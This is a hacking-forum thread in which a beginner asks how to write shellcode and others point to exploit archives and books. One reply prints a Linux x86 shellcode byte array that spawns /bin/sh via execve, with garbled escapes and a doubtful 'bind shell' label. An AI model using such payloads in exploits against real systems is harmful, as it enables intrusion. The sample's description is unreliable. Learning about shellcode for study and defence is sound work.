Shell Code

Viewing 5 reply threads
  • Author
    Posts
    • #1961
      JJJHS13
      Participant

      Sorry i didn’t really know where to put this question. I want to write my own shell but i have no clue where to start, which programing languages to learn. Ive been trying to get articles from packet storm but they mainly just have exploits, i found a couple of articles searching the web and only got tips on securing shells but i cant find a decent one on how to write my own. If you could give me starting point it would be much appreciated.

    • #15370
      Anonymous
      Participant

      Hi JJJHS13,

      You might want to learn to walk before you start running with scissors in your hand. But if you’re looking to learn about exploits and shellcode then looking at existing exploits is not a bad place to start.

      Developing exploit code is not really dependent on a specific language you can write an exploit in perl, python, C or Assembly for example. Shellcode is generally written in C and converted to ASM in order to reduce the size of the payload. If you look at one of the exploits on Milw0rm.com you will see the payload represented by something like the following:

      char code[] = “x31xc0xb0x46x31xdbx31xc9xcdx80xeb”
            “x16x5bx31xc0x88x43x07x89x5bx08x89”
            “x43x0cxb0x0bx8dx4bx08x8dx53x0cxcd”
            “x80xe8xe5xffxffxffx2fx62x69x6ex2f”
            “x73x68x58x41x41x41x41x42x42x42x42”;

      This is the hex representation of the bytecode. This shellcode is for a bind shell on a linux platform. It makes a call to execve() in order to spawn a shell using /bin/sh. Gotta love “int 0x80”!

      Obviously, writing shellcode for each OS platform is different and requires a different approach.

      There are some excellent books on the subject as well such as:

      Sockets, Shellcode, Porting and Coding by James Foster

      As for Google: try “writing shellcode” <– got me hundreds of hits.

      dean

    • #15371
      JJJHS13
      Participant

      hey thanks man

    • #15372
      Clay Briggs
      Participant

      I picked up a shell code hack book earlier this year.. and after the first chapter I realized without a solid knowledge of C and assembly language.. I was wasting my time even reading it.  It’s on my shelf until next year or so.  Running with scissors is an understatement.

    • #15373
      dannioni
      Participant

      I’ve got Gray Hat Hacking this week, I haven’t read all of it, but for Table of Contents I’d say this is just the book you’re looking for. Of course prior experience with C/C++/ASM is helpful you can get by without it, at least with this book.

    • #15374
      Don Donzal
      Keymaster

      If anyone wants to check out the entire chapter in Grey Hat Hacking that introduces you to coding, it’s right here on EH-Net:

      Grey Hat Hacking – Chapter 7: Programming Survival Skills

      Hope this helps,
      Don

Viewing 5 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2021 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?